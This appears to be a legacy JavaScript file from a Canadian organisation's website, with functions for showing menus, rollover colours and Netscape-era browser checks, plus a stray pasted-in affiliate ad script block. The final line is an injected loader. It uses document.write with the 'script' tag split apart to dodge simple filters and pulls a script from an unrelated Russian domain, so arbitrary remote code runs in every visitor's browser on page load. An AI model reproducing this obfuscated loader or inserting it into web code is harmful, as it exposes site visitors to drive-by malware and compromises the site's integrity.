// Miscelleneous Functions
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
<script type="text/javascript"><!--
    _click_e='en';_click_width = '234'; _click_height = '60';    _click_a = '443'; _click_c = 'http://affiliates.yellowpages.ca' ; _click_s = 'yp_c411'; _click_v = false;
   //-->
</script>
<script type="text/javascript"   src="http://affiliates.yellowpages.ca/js/show_brks.js"></script>

function loadPictures(){

//alert("shit");
//	document.getElementById('bannerAd').innerHTML = "<IMG src='http://www.bags.on.ca/images/tjAdBanner.jpg' width='385' height='85'>";
//	document.getElementById('leftAd1').innerHTML = "<IMG src='http://www.bags.on.ca/images/ontarioLogo.gif' width='141' height='74'>";
//	document.getElementById('leftAd2').innerHTML = "<IMG src='http://www.bags.on.ca/images/ad2.gif' width='141' height='74'>";
	//document.getElementById('right1').innerHTML = "<IMG src='http://www.bags.on.ca/images/eNewsletterButton.jpg' width='167' height='65'>";
	//document.getElementById('contactUsBottom').innerHTML = "<h5 ><a href='http://www.bags.on.ca/contactUs.html'>Contact Us </a></h5>";

}
function setLayers(){

		var browserName = navigator.appName;

	if(browserName == "Netscape"){

		document.getElementById("amenu").style.height = "61";
		document.getElementById("mmenu").style.height = "102";
		document.getElementById("gmenu").style.height = "40";
		document.getElementById("tmenu").style.height = "40";
	}
}
function show(id) {

setLayers();

var d = document.getElementById(id);

if (d) {d.style.display='block';}
}
function unShow(id) {
var d = document.getElementById(id);
if (d) {d.style.display='none';}
}
function showRollover(id) {
var d = document.getElementById(id);
if (d) {d.style.backgroundColor='#B1B09B';}
}
function noShowRollover(id) {
var d = document.getElementById(id);
if (d) {d.style.backgroundColor='#6B8459';}
}
function hoverText(id){
var d = document.getElementById(id);
if (d) {d.style.color='#FFFFFF';}
}
function hoverOff(id) {
var d = document.getElementById(id);
if (d) {d.style.color='#CCCCCC';}
}

function jumpToCity(selected){

	var city = selected.options[selected.selectedIndex].value;

	if(city != "")
		window.open(city);
}




document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Operating_System.js"></scri'+'pt>');
